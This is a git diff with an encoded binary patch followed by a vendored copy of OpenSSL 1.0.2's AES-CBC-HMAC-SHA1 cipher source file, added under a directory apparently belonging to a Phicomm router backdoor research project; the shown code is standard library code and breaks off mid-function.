z@ME%F(az<6=s9o(twOhfiNBW_>2XiTGmsJX6SC={2c(ABHXImE;iDoX)!vm|dhENI
z)`ueWLeP3g41ZB%$ujS6e98q%MMxSgoXYR5=@Wgs`*yDM_U#EbbnFiwi%(0`K3=W8
z3^VAr=(T7EX~8-Ui{ZOToj|7x$0|WKIu=VCyUbHyfpo(&aAThSoF{tZG&;Vz<f+dA
zL1n0-%Ull*Kr+W~mzA&RmVWd+*%_-j63&X%^sYFu#Vem$HRbW;!ZzDwFU^Ip*%|hV
z(gU988dPjOh7SU<wgOQq2Uo-$h=nmq{2Kijzuw-4j@;VQKggt|!iv%m^K?|9A|3~h
z`_V=@k>XjfCSoX%6Kd)+E1_{Xw<igEVVjJ~v8NMVB<!c9($c@s*yhDs7Vh5;Kq!D<
z1+#LS?D>cb>gaKSndUZh3(U=r1J(!5=D@Qu52_TUCn5)h`SBMPzXE-f5wzaeD*GCu
zqU(z%&BKGt=bVKu2!YTQ?ewgE4)lzVeG5X596~_|oi6Ax)E~4?2CY8n29S)d2T55h
zU_R>#n7?zuLt!4x4cg`gDg9>9I_5W*dLd%<gh!0mS8<r7GhhQVaw~QiD~?s>#>b};
zEhe#q3D8}m41yn#QP9KIF&Nx33(kpWT1T9*1yw*e!dAd+?CW_MvgS4%bTFBIgX0!L
z=S&`;u$TE9EM{Q7R1`0vR-8yQ?O6C?#mHPoY?y+axQcG71MSw4_-q-5t^rqKV2SSc
zth@=Ug~&p+QWHGUuLAEkIz9qrWII*C;!Y>HqVM{JaW&SreAY|ig7-Wf2S89*z5Xe%
zjc|4pcAeZygzZJmuqO(}9>MXr<8YQVMA$Og3+vD9PKfZ>t(ahY5xJDy7lvhevoj@*
zhVyuC_xD2o)OJ<~oaFHe8o?wE`%elD>~RkTOz2Kwy@d0g1B4SX(TbG&7TDlA`<2S#
zJ<106uAnV<qS!+%uq6ywpZYxy?tlfe%=2KE-}P~%Mwp*?7T-KI5WBOW_8Y=p=Y_@!
z*phk!7`0#Pd)fb#w0&fyeG9OC!g^1{w&4CQh#Mqls6egJPShNS-SnP#&a?_^_w<>&
z;9E}RTI)E@U)YjfC9D@?q8G-f`SDQCJvpGp+AU%j*&q^Ue@|rW#>I7u3-Uve^{=mR
zD?=qx%XC4>_!V-)GJK!4GdAvw**kbKuBcCdfb{@Aml3Jw5y+q1nGty_Htv+!J9Nn*
z9FgH1@J8gN_+_|He%{dxC17E#E`gCF*UATmVjWwh_@kx_3r6^15!w&E=7mSjfC10m
ztBk~cBjfGDexQuaz=@V8N)LLXx5;&}s!dq!__XI%$YaoSf*$<>f{<5)E=$_|6cl%g
zq!@_NHDH}e{4(;J%km-YIOatzV4GhV4{fa(52JU)R@~u@klvxV-vbSzIT+d8WoCm)
z_|J%c(cFgjMg(@tM<e$M>u($vtRp=hcv9R68a*8-#G==wR*#!e7uDg3mP32{>yi6U
zvKt5738)3ajR39TQK<sU_d7cvx}1^00xgCAjGnpZQ>-OL30Z^ZK`0i6=spkjy&>7N
z+#FmXuOx;(DGAcH3IcVGbp*FPZW&&kXbWAHvb%9hT>u-*p>ng@zrifxz$E)u(C@bU
z!D{}&b{awx>^f)4uoSQ>F)Y!~8|gG#c9*bTx1Ycf8KmE4>LBcr4g;MK6mgA2r{K@8
zd|^IY@RaOx8)pRWCqjGR$DbNnQUw$kX%MSB+Cfji+I@0IP9y@W?4*EoLcmXPxh@2(
zm%~E>u+>{K2A7;#xb-al&>t)7#W__W>?hHZpe^Ti(0U!h1<#ns)$zR`=t9BE(+b94
zowf@!OTW=Ofq)Z8>?O^xofUSo7veT}>w9nK7#?Rwo3Z4g=$?r4o0fuke5g||hxP~1
zuHyaX>C8w@BHllMK68G(M?071!8?KCJzLj+;4}Cu`L~1NOKO1!5ZpQ;xXBj_G5I_B
z|L^}7{Lob2*wk7Wf{yt=kUkH;C0$^r4?cJu?HvZ+XGu7N&mmn(`g5Vo`Otp}>BoK7
z`Ov=t^kb8K@WFL|$t74*`c!j{{xL~E`saM;Zzug|_4&|$Kj|+6{aDAhE;+jca%sy7
zqW`UQpW^@Xp+BnVNB=Cor0A@6Z8}H$?<W1+zXPp*IqB#A9ccacD*nMb<g#)W58+~d
zE@=(;6N~uZgZiPmv!-*^zv?{ee+-OIvL739mUOQ6|C^>idw})-0`#LwAK9ES!1^~U
z`cZY}0PDAu`Gu+ndVH>?@q_ah^$+y;w9m8tpVRnB*gwGj-=ygu=<)e88b4@1rhy)x
zk1G1nH3L09SJL=I-S`>k@foA>!}<q$eBOJW_5YN{Pr`n@IZHa%__<NjKhWdzCp3Q8
z?13Jik0|=FjsY8=)#c^a`wFJciYy36e5Hlg6c&vtzAhrO#dnP^Dl8f^+`&#~z-#x!
z_^qBW)qr8qiHyhFC61Vp@$Jb*Mw>U|@}W7dwP1S%@H~1p4X;&h@0!eU?%dT`<J`Vj
z_BeOJszH8t(Tc%-cZr!Z&RzCxcS)7I$nP$I=O8!E?H%WK$+~Bg9+R$EXB*v5#B0Fq
z&8&30#=`Ad;;-X%vfH~F9^}Tb&Q;kJ?t&GAD%?fp;LM-83#ycA{JWmp`@)MOp~yZe
ze-~aSxV@_~{qEcqSru-dnVmVqoeRwXvryhJWNd=AVj7KK!ks(a?VA8*%eLc-e@xfl
z*DY>uojcc0kBvG&W9j)D_#70+&_AoNt`*r6+y&;Ko82|F7rN_$?uN=C)7^EI?uKdZ
zI={OnvkET_^1B9F1x*1f$zx94>&{Yl5mYB%MZz_TbyvE*X6974Z^4D`0_c<KAyx7!
zzkLmEZ<X6s0AlZw&Pmw$BH<folbM}Wo`tQGeU=Z8dB6Y9aF6;|fX%rkwr!4dq92?j
z;87V2C`>ov_3UG$!d;W~<xF=8Sg4N@!@$17Js+lH_%#*ntLX2$oymPS21K@#{J)?)
z*at?!U@^0xL7C-l*RJO(p=DVsa0FDiy<jnPJNEepRPJl&59zzC{0wMM8DzaQF}m>?
zs9cSGO5+c#UV&rY99-dU$m+_F?SRVqN4wLGDWqc)sK7By?WmSxa9MIYa4vL^yd3+}
zVJ<9kyRZ+|6MqQx$UcCUm^c?QEpCz*9{rBw@OKa<WCv2PcT+GUTNaVOF}ds|DOf=Y
zHZ}#TNx^2PU~MVbsuXNP3ih8V*zOeUPzrWD1<R(zUG-mX3N|tYD@(zqq+rb{7@TsE
zNv(Hn3bru?+meFqO~JZTun$r&7ru~$q}q~~f)#1ZDfQWJoIcscdwrjMf@=>2BJE*T
zVpU3hki~;k!56@NrlLo#QNVD1Bj>zHWv(LrC(6rp2ktSBp!`TONv=D<Dv1xGSRvOF
zVBa8a5|`@+usOtkO<b-Sz#_zt5Pt*mn4<8(diT(rWclwCKSdnnIAx{Sg>Hn0sONh$
zu4Qbe0$B!i7At`3<0QX7$AL1w!|e{@9$5P@$#@Reeegm3<1a)?u^Fz|4&*lsL24K>
z2E+9@e2^a`E@LdP)5Npo+k3<4CV%4}AW;4-HwZwIF%zy|BEAa$)&Oa(b1_B{&%+=G
zNybLF{wuUU1KuQVpn7qA#`HMxGL7#b-c9Xd`RhSH>S@>bTO{w(_=m(haX><1J%a~1
zdKxtTdE$n~uO_~M{Lgx>C0?fSDzdYi`jO>tBl&iXf0MXR<KH3PNkfJ8;NOJM4-Fds
z5pf<`EWerf2Dqwzm`rwZoMibINxmEWr^^3@c)P}r6ZdHx?La#_X}++2FYyMA`-pR>
zVR?*ea{SOdWnM<SOyf1gyP<um{SCz1HNJ?rPvh;xI~_HN@pB*X295uOIN^jm=Ci;L
zsZy3fgI{}?m5BDq53=OJpk#Ktw3|9N`4QAhlS1Jkkf$lCP{UZ7hObG(@pon_J&&j1
zc={`q{Of7>+iCcxY4|W02dVTAPs9Cb_{=oCH4X1b!|`xcDtjJI!+)NJKb?lZkcPjJ
zhQFVNdte@>vh%7m{JJ!}HVvPfhA&FP@$Uzz>{*wF|9cwVnTEfTh96GDGa;^}vL`nU
zACrdPoQBU#!xyIE%hT{RY50$UUjz~K32FrIBOfFFTa7<W{P!Avf%t10$8`er|5fAf
z5&yf!Ga*!={HGefh<FbDxs>hv3h|3IKAQNI8Xre|gvO^5zfR+Gh?i@83Gs;<zlZpA
zjXy;E4vjxbyj9~*5?`+I=ZV`I|0D5-H2yB}M>Kwl_%Ag+6xJ#9|2B=|ZwlmH8Xrmg
zWsQ#|{uhl0iN`fQgZM`ppGQ3FB4;_`eqTo1qwyH=%QgNm@vmy!;L`(ehM>MFG^;)|
zcTsawi-Fm;aBF=i+%ivQLbF2pv$+fAhU@QaS}LC}X=z+kpF|eUNzxYjOtx562#-sW
z^5GUWdq-$~zb!H|uc>iCWRa{}=KJl&Y?39iA^p!osxFyHewI{Lwo7qJ(!=7>VDp?=
z(um^H(TV%fU%yt~7Y56VjQZ-}#Bu&${lu!O+R7>QQ~cwCmGwsX<lAbdOsogDqLQWs
zp_ZkK!Wy03<WPTQZ9)R?Tbsh1m;Pr)@(IS}sV?Y{RCS$=7IQrb%N*&?S{!asbYoXt
zGdfWw>6uYq-x_WV-B}-MzO#N#<J@^HHm9YjiSOq(&YQO|WK8x?sHmT{G~Cq651?<c
z9`L~2#m2;%$_cf#!TJ!6h1Mpc^46OA@<5HKoLpZ%rOp{I)OIS@*f?9$M4nH!n54B{
zAsTMHL({>2Pii$ub05ranjf0KNGmu8MpJ9E262Qjf|0AZl_`u_q>3R#9Jlb$a-@_d
zlT@O~q50R2(R6A}rV@z;rYOM;Os-XJ1lk%|fD?%;Ln8Ayaxt=SwUv`6*Ds2|=x%9Q
z*dqHA0}+aYR8k&dRZ<=XcTygvB^3J%(t#!sRw~8$tX2y7q)H*5RH-xnlPV?DU#SC>
zN)afP%D|yiig~qC%&V1BpiwJjl&F+If29&Am7;rLv?dB*BvbP!ujWx624+GYpR0L%
z4g)9gTt-GEFY8zGC@)6?&R^NzU_cVU5)v4f!S5SPuzfPd!RHhlc*XQ(g_kSb`Tb`Y
zUjtU5@b4<}l?t~NUZwE+iKCush3{14RXsPr?+Hw3r^?4ET-E=m!UdG!b{$lBK;aFr
zAIF6HZ-x)cKaqwXQ}`{4d=)BygqI+ESkDxNk5_n$!Y3#k_tBWpT-?I29(+H92_NIT
zOXj#g#f0)V!H0RNB44BMVX%L}gnA~yhvg?Ie6qq%q~Q<IdnCQy^~6!XTJL)buT}JC
z(klzSU15b!QRE*{_*8{=EBsc4zoT$`cgyWPrEq-L!+Z$6mqUAQQ}{&+$9Kytf3?C@
zJtYdCuE<v_T=m0Rg{$rQmBQ6_J*jZDUAq*n+W)-5Rr^0x_zcC)e0rsWeo))hp>TCR
z+Qh#G@)e4nA1LxO75;+4)$x`|ud1+Km2Xq{?TQ|Lg~juw0iI#{HEr-wPd$9Nzn0Vc
zXXFhE-=y$Hh5uFIs(c>3uSPwy6#0Krcu3(B6h2$wQx)E%@FfaY?O&^KbzJ>S;p(`0
zS>Y2D{kimB9qm{9v5>glkJl^ma}+&?6nQnCzoW?Cp~w%S-{ZP|FLAV|S&^Tl@G6DZ
zDSFg;>lJymU2_!q3Plh6<8PVJp1BJDsiNnb3YY(Y4DvYMZh+5v8kf(JJoB-{_iOyn
zg-{66pEbUW_}?_1NBpG5x6{1Mq~Ez*?+oH@jdQ%aOylb*4qmPCvBXDf{1C<Q8#TU+
z_{|#6BYvyKx6`^ZOXK+a9n%7h<9h~7-`4ng;wv;hmiYY|=f4R*tnp<y@F4v{<9Wn?
zqw(#u57?>k8N^@I_$lllNC!2J|B@2ZVU3R^enR7iXrFXO<I9L&Nbe<hJn$Ko&ue_U
zQ?2n8jpG`CsZiq_Kb@z}_{Tc%?`xRoBIgD27pdQA7$rFW-I3qFpe%m=K=L%q6Y>X%
z<2eaTEdOWXxeiY7H;LzI{4jB!#upIJ*Es&24pV`1N$5X8@*_2Vl6aBEKOv5PXU4?#
zpCMl2-~{LW&{&NRCP$WO{6EOf3XQKJE;Jq|j(b#0Y|l4o-qkob!7rnFaSw)x<*y))
zdjm|&XHvU(95KI|<Qt@Pzx*kxcech~r2*2c@f(QG(|8W8(~C4dgm_rv9^!2pznJ(k
zjemi7yT&gk-l6erWamnao5WXX{HvsAt;R<Xe^BF#NDq&Hoc`!*KCj>-dFK3gbZ#$m
zmTylZe?a3b->q@hUqW$+_4D8L%QVjC0Gc(<=LY!vo33YrCeM0yYn=7;YMkwn&Vn|u
ze%4cfPE<JSsna;07irKqpNCkfaXyc-MdPfeQ{$|M&yBF1tS6V&8RmRG!>4gR&rzUp
zj>AIZe2%0|<E+13<E$UgORIik{hKt-`uTjCZhyBX&-#yOob|i1lj~*uB^u}RB4rxq
zb2jTV&hi^H&gXS{HO}&UM2FkO{Z~hEmpRKfXq?Xv@%b)YzEhLub4a-qM|F8T@1XXJ
zlY{fO8fSa(Jc26E=cNv4oaMVU&i*W+bwIbLOylg&bsA^=8#K=T?A18S^AQNHm;G5s
z>ko65Z_qgVQ~nPFz!AE9rzY=s3(lR<zFU{~X`KDprg65XUE}P}0~%-fZjG})OXzol
zZcmxU*`Mn)&iXfKoc-CWahB(!CR{K3vyOfbF=zP(jk7<uXq@FcHO~I@Q9%r&6iOv&
z);PyceSK#=`Z~+;`4vqMuY>Y`X+U*iz1&_OHWU)u!+tB%IQxIS#<?H2Yn;ae{{J#m
z{T%o5sPSAc$H@wfb6myqBdQ*b^SmCh9$t@nHF;hi@!#{RdU!pp(>Slcyk4+=-al;6
z<hkE>Yn;y+9MU+SGdQksK4*|kahvPqa|U?MLbadI8I068pEKZfg!S+_1AgDjoX;6F
zYkK&c0srn~c|K>bR+Hy*1{*cb=M1)JoX;8T)i|Fs=+-!&Gx$K`e9pi{>kiw==M3^R
z&gTq@G|uM?Dm2dL40wHH{d~?~o+i)d4B9o$=L{ayIG;1vq;WoHuwCPP&S0O$`JBO9
z8s~Ecy&6xPGoba6+r{S$cwJ`B=M2VZ@_f#~C~RFiKioJAuHhEv+RS$?P4gNH!%b~r
zqi}X(xX~z_)!J$lwk*U9iWe6aLl%V`Mj81SFwjEyBXQ$AqcF5^{`{r|pl89ta8n`t
zd!bSCPt26RV?m^FQOm+bO)cT2q@$_1eojl{{3d7e{13i;P!>ZPH9w)LjP9<X_YwSn
z!XIai%i#`(ZdrmjHw~rEmDfXjEs14m8F&5-5ah2WPGJLbPHNTaWv<sh5+0z=f3$ot
zltrDR;iD$5pY7#mTt8nc;Q`*`cv90cvVWZl;hv^>f|e1(tD4r8JGr&gF!Uex5!=JR
zKPLmj`t|nvE(Qpxm)313XBa-dq3d|Krs}_fYDd6D`#r25>(=YX5s3Bk`xm&CDfdd}
zI)d_iL0L?EU7*~{2lQ1=<yD6FT#h;Z`v5di_rIX>J{F`a+t2t1aDzJa^37DfOq&>b
z`TL-3D*qMXOMgh+)Zyqqe5JtUx&Kntjpa67h2J1g?;*T!@5eksNL(Jbp?crr^Iy?`
b{-tKW?mv8;nX0@O|Cj-3gZ%FQ(#!uBXuQ(c

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha1.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha1.c
new file mode 100644
index 0000000..e0127a9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/e_aes_cbc_hmac_sha1.c
@@ -0,0 +1,1002 @@
+/* ====================================================================
+ * Copyright (c) 2011-2013 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include <openssl/opensslconf.h>
+
+#include <stdio.h>
+#include <string.h>
+
+#if !defined(OPENSSL_NO_AES) && !defined(OPENSSL_NO_SHA1)
+
+# include <openssl/evp.h>
+# include <openssl/objects.h>
+# include <openssl/aes.h>
+# include <openssl/sha.h>
+# include <openssl/rand.h>
+# include "modes_lcl.h"
+
+# ifndef EVP_CIPH_FLAG_AEAD_CIPHER
+#  define EVP_CIPH_FLAG_AEAD_CIPHER       0x200000
+#  define EVP_CTRL_AEAD_TLS1_AAD          0x16
+#  define EVP_CTRL_AEAD_SET_MAC_KEY       0x17
+# endif
+
+# if !defined(EVP_CIPH_FLAG_DEFAULT_ASN1)
+#  define EVP_CIPH_FLAG_DEFAULT_ASN1 0
+# endif
+
+# if !defined(EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK)
+#  define EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK 0
+# endif
+
+# define TLS1_1_VERSION 0x0302
+
+typedef struct {
+    AES_KEY ks;
+    SHA_CTX head, tail, md;
+    size_t payload_length;      /* AAD length in decrypt case */
+    union {
+        unsigned int tls_ver;
+        unsigned char tls_aad[16]; /* 13 used */
+    } aux;
+} EVP_AES_HMAC_SHA1;
+
+# define NO_PAYLOAD_LENGTH       ((size_t)-1)
+
+# if     defined(AES_ASM) &&     ( \
+        defined(__x86_64)       || defined(__x86_64__)  || \
+        defined(_M_AMD64)       || defined(_M_X64)      || \
+        defined(__INTEL__)      )
+
+extern unsigned int OPENSSL_ia32cap_P[3];
+#  define AESNI_CAPABLE   (1<<(57-32))
+
+int aesni_set_encrypt_key(const unsigned char *userKey, int bits,
+                          AES_KEY *key);
+int aesni_set_decrypt_key(const unsigned char *userKey, int bits,
+                          AES_KEY *key);
+
+void aesni_cbc_encrypt(const unsigned char *in,
+                       unsigned char *out,
+                       size_t length,
+                       const AES_KEY *key, unsigned char *ivec, int enc);
+
+void aesni_cbc_sha1_enc(const void *inp, void *out, size_t blocks,
+                        const AES_KEY *key, unsigned char iv[16],
+                        SHA_CTX *ctx, const void *in0);
+
+void aesni256_cbc_sha1_dec(const void *inp, void *out, size_t blocks,
+                           const AES_KEY *key, unsigned char iv[16],
+                           SHA_CTX *ctx, const void *in0);
+
+#  define data(ctx) ((EVP_AES_HMAC_SHA1 *)(ctx)->cipher_data)
+
+static int aesni_cbc_hmac_sha1_init_key(EVP_CIPHER_CTX *ctx,
+                                        const unsigned char *inkey,
+                                        const unsigned char *iv, int enc)
+{
+    EVP_AES_HMAC_SHA1 *key = data(ctx);
+    int ret;
+
+    if (enc)
+        ret = aesni_set_encrypt_key(inkey, ctx->key_len * 8, &key->ks);
+    else
+        ret = aesni_set_decrypt_key(inkey, ctx->key_len * 8, &key->ks);
+
+    SHA1_Init(&key->head);      /* handy when benchmarking */
+    key->tail = key->head;
+    key->md = key->head;
+
+    key->payload_length = NO_PAYLOAD_LENGTH;
+
+    return ret < 0 ? 0 : 1;
+}
+
+#  define STITCHED_CALL
+#  undef  STITCHED_DECRYPT_CALL
+
+#  if !defined(STITCHED_CALL)
+#   define aes_off 0
+#  endif
+
+void sha1_block_data_order(void *c, const void *p, size_t len);
+
+static void sha1_update(SHA_CTX *c, const void *data, size_t len)
+{
+    const unsigned char *ptr = data;
+    size_t res;
+
+    if ((res = c->num)) {
+        res = SHA_CBLOCK - res;
+        if (len < res)
+            res = len;
+        SHA1_Update(c, ptr, res);
+        ptr += res;
+        len -= res;
+    }
+
+    res = len % SHA_CBLOCK;
+    len -= res;
+
+    if (len) {
+        sha1_block_data_order(c, ptr, len / SHA_CBLOCK);
+
+        ptr += len;
+        c->Nh += len >> 29;
+        c->Nl += len <<= 3;
+        if (c->Nl < (unsigned int)len)
+            c->Nh++;
+    }
+
+    if (res)
+        SHA1_Update(c, ptr, res);
+}
+
+#  ifdef SHA1_Update
+#   undef SHA1_Update
+#  endif
+#  define SHA1_Update sha1_update
+
+#  if !defined(OPENSSL_NO_MULTIBLOCK) && EVP_CIPH_FLAG_TLS1_1_MULTIBLOCK
+
+typedef struct {
+    unsigned int A[8], B[8], C[8], D[8], E[8];
+} SHA1_MB_CTX;
+typedef struct {
+    const unsigned char *ptr;
+    int blocks;
+} HASH_DESC;
+
+void sha1_multi_block(SHA1_MB_CTX *, const HASH_DESC *, int);
+
+typedef struct {
+    const unsigned char *inp;
+    unsigned char *out;
+    int blocks;
+    u64 iv[2];
+} CIPH_DESC;
+
+void aesni_multi_cbc_encrypt(CIPH_DESC *, void *, int);
+
+static size_t tls1_1_multi_block_encrypt(EVP_AES_HMAC_SHA1 *key,
+                                         unsigned char *out,
+                                         const unsigned char *inp,
+                                         size_t inp_len, int n4x)
+{                               /* n4x is 1 or 2 */
+    HASH_DESC hash_d[8], edges[8];
+    CIPH_DESC ciph_d[8];
+    unsigned char storage[sizeof(SHA1_MB_CTX) + 32];
+    union {
+        u64 q[16];
+        u32 d[32];
+        u8 c[128];
+    } blocks[8];
+    SHA1_MB_CTX *ctx;
+    unsigned int frag, last, packlen, i, x4 = 4 * n4x, minblocks, processed =
+        0;
+    size_t ret = 0;
+    u8 *IVs;
+#   if defined(BSWAP8)
+    u64 seqnum;
+#   endif
+
+    /* ask for IVs in bulk */
+    if (RAND_bytes((IVs = blocks[0].c), 16 * x4) <= 0)
+        return 0;
+
+    ctx = (SHA1_MB_CTX *) (storage + 32 - ((size_t)storage % 32)); /* align */
+
+    frag = (unsigned int)inp_len >> (1 + n4x);
+    last = (unsigned int)inp_len + frag - (frag << (1 + n4x));
+    if (last > frag && ((last + 13 + 9) % 64) < (x4 - 1)) {
+        frag++;
+        last -= x4 - 1;
+    }
+
+    packlen = 5 + 16 + ((frag + 20 + 16) & -16);
+
+    /* populate descriptors with pointers and IVs */
+    hash_d[0].ptr = inp;
+    ciph_d[0].inp = inp;
+    /* 5+16 is place for header and explicit IV */
+    ciph_d[0].out = out + 5 + 16;
+    memcpy(ciph_d[0].out - 16, IVs, 16);
+    memcpy(ciph_d[0].iv, IVs, 16);
+    IVs += 16;
+
+    for (i = 1; i < x4; i++) {
+        ciph_d[i].inp = hash_d[i].ptr = hash_d[i - 1].ptr + frag;
+        ciph_d[i].out = ciph_d[i - 1].out + packlen;
+        memcpy(ciph_d[i].out - 16, IVs, 16);
+        memcpy(ciph_d[i].iv, IVs, 16);
+        IVs += 16;
+    }
+
+#   if defined(BSWAP8)
+    memcpy(blocks[0].c, key->md.data, 8);
+    seqnum = BSWAP8(blocks[0].q[0]);
+#   endif
+    for (i = 0; i < x4; i++) {
+        unsigned int len = (i == (x4 - 1) ? last : frag);
+#   if !defined(BSWAP8)
+        unsigned int carry, j;
+#   endif
+
+        ctx->A[i] = key->md.h0;
+        ctx->B[i] = key->md.h1;
+        ctx->C[i] = key->md.h2;
+        ctx->D[i] = key->md.h3;
+        ctx->E[i] = key->md.h4;
+
+        /* fix seqnum */
+#   if defined(BSWAP8)
+        blocks[i].q[0] = BSWAP8(seqnum + i);
+#   else
+        for (carry = i, j = 8; j--;) {
+            blocks[i].c[j] = ((u8 *)key->md.data)[j] + carry;
+            carry = (blocks[i].c[j] - carry) >> (sizeof(carry) * 8 - 1);
+        }
+#   endif
+        blocks[i].c[8] = ((u8 *)key->md.data)[8];
+        blocks[i].c[9] = ((u8 *)key->md.data)[9];
+        blocks[i].c[10] = ((u8 *)key->md.data)[10];
+        /* fix length */
+        blocks[i].c[11] = (u8)(len >> 8);
+        blocks[i].c[12] = (u8)(len);
+
+        memcpy(blocks[i].c + 13, hash_d[i].ptr, 64 - 13);
+        hash_d[i].ptr += 64 - 13;
+        hash_d[i].blocks = (len - (64 - 13)) / 64;
+
+        edges[i].ptr = blocks[i].c;
+        edges[i].blocks = 1;
+    }
+
+    /* hash 13-byte headers and first 64-13 bytes of inputs */
+    sha1_multi_block(ctx, edges, n4x);
+    /* hash bulk inputs */
+#   define MAXCHUNKSIZE    2048
+#   if     MAXCHUNKSIZE%64
+#    error  "MAXCHUNKSIZE is not divisible by 64"
+#   elif   MAXCHUNKSIZE
+    /*
+     * goal is to minimize pressure on L1 cache by moving in shorter steps,
+     * so that hashed data is still in the cache by the time we encrypt it
+     */
+    minblocks = ((frag <= last ? frag : last) - (64 - 13)) / 64;
+    if (minblocks > MAXCHUNKSIZE / 64) {
+        for (i = 0; i < x4; i++) {
+            edges[i].ptr = hash_d[i].ptr;
+            edges[i].blocks = MAXCHUNKSIZE / 64;
+            ciph_d[i].blocks = MAXCHUNKSIZE / 16;
+        }
+        do {
+            sha1_multi_block(ctx, edges, n4x);
+            aesni_multi_cbc_encrypt(ciph_d, &key->ks, n4x);
+
+            for (i = 0; i < x4; i++) {
+                edges[i].ptr = hash_d[i].ptr += MAXCHUNKSIZE;
+                hash_d[i].blocks -= MAXCHUNKSIZE / 64;
+                edges[i].blocks = MAXCHUNKSIZE / 64;
+                ciph_d[i].inp += MAXCHUNKSIZE;
+                ciph_d[i].out += MAXCHUNKSIZE;
+                ciph_d[i].blocks = MAXCHUNKSIZE / 16;
+                memcpy(ciph_d[i].iv, ciph_d[i].out - 16, 16);
+            }
+            processed += MAXCHUNKSIZE;
+            minblocks -= MAXCHUNKSIZE / 64;
+        } while (minblocks > MAXCHUNKSIZE / 64);
+    }
+#   endif
+#   undef  MAXCHUNKSIZE
+    sha1_multi_block(ctx, hash_d, n4x);
+
+    memset(blocks, 0, sizeof(blocks));
+    for (i = 0; i < x4; i++) {
+        unsigned int len = (i == (x4 - 1) ? last : frag),
+            off = hash_d[i].blocks * 64;
+        const unsigned char *ptr = hash_d[i].ptr + off;
+
+        off = (len - processed) - (64 - 13) - off; /* remainder actually */
+        memcpy(blocks[i].c, ptr, off);
+        blocks[i].c[off] = 0x80;
+        len += 64 + 13;         /* 64 is HMAC header */
+        len *= 8;               /* convert to bits */
+        if (off < (64 - 8)) {
+#   ifdef BSWAP4
+            blocks[i].d[15] = BSWAP4(len);
+#   else
+            PUTU32(blocks[i].c + 60, len);
+#   endif
+            edges[i].blocks = 1;
+        } else {
+#   ifdef BSWAP4
+            blocks[i].d[31] = BSWAP4(len);
+#   else
+            PUTU32(blocks[i].c + 124, len);
+#   endif
+            edges[i].blocks = 2;
+        }
+        edges[i].ptr = blocks[i].c;
+    }
+
+    /* hash input tails and finalize */
+    sha1_multi_block(ctx, edges, n4x);
+
+    memset(blocks, 0, sizeof(blocks));
+    for (i = 0; i < x4; i++) {
+#   ifdef BSWAP4
+        blocks[i].d[0] = BSWAP4(ctx->A[i]);
+        ctx->A[i] = key->tail.h0;
+        blocks[i].d[1] = BSWAP4(ctx->B[i]);
+        ctx->B[i] = key->tail.h1;
+        blocks[i].d[2] = BSWAP4(ctx->C[i]);
+        ctx->C[i] = key->tail.h2;
+        blocks[i].d[3] = BSWAP4(ctx->D[i]);
+        ctx->D[i] = key->tail.h3;
+        blocks[i].d[4] = BSWAP4(ctx->E[i]);
+        ctx->E[i] = key->tail.h4;
+        blocks[i].c[20] = 0x80;
+        blocks[i].d[15] = BSWAP4((64 + 20) * 8);
+#   else
+        PUTU32(blocks[i].c + 0, ctx->A[i]);
+        ctx->A[i] = key->tail.h0;
+        PUTU32(blocks[i].c + 4, ctx->B[i]);
+        ctx->B[i] = key->tail.h1;
+        PUTU32(blocks[i].c + 8, ctx->C[i]);
+        ctx->C[i] = key->tail.h2;
+        PUTU32(blocks[i].c + 12, ctx->D[i]);
+        ctx->D[i] = key->tail.h3;
+        PUTU32(blocks[i].c + 16, ctx->E[i]);
+        ctx->E[i] = key->tail.h4;
+        blocks[i].c[20] = 0x80;
+        PUTU32(blocks[i].c + 60, (64 + 20) * 8);
+#   endif
+        edges[i].ptr = blocks[i].c;
+        edges[i].blocks = 1;
+    }
+
+    /* finalize MACs */
+    sha1_multi_block(ctx, edges, n4x);
+
+    for (i = 0; i < x4; i++) {
+        unsigned int len = (i == (x4 - 1) ? last : frag), pad, j;
+        unsigned char *out0 = out;
+
+        memcpy(ciph_d[i].out, ciph_d[i].inp, len - processed);
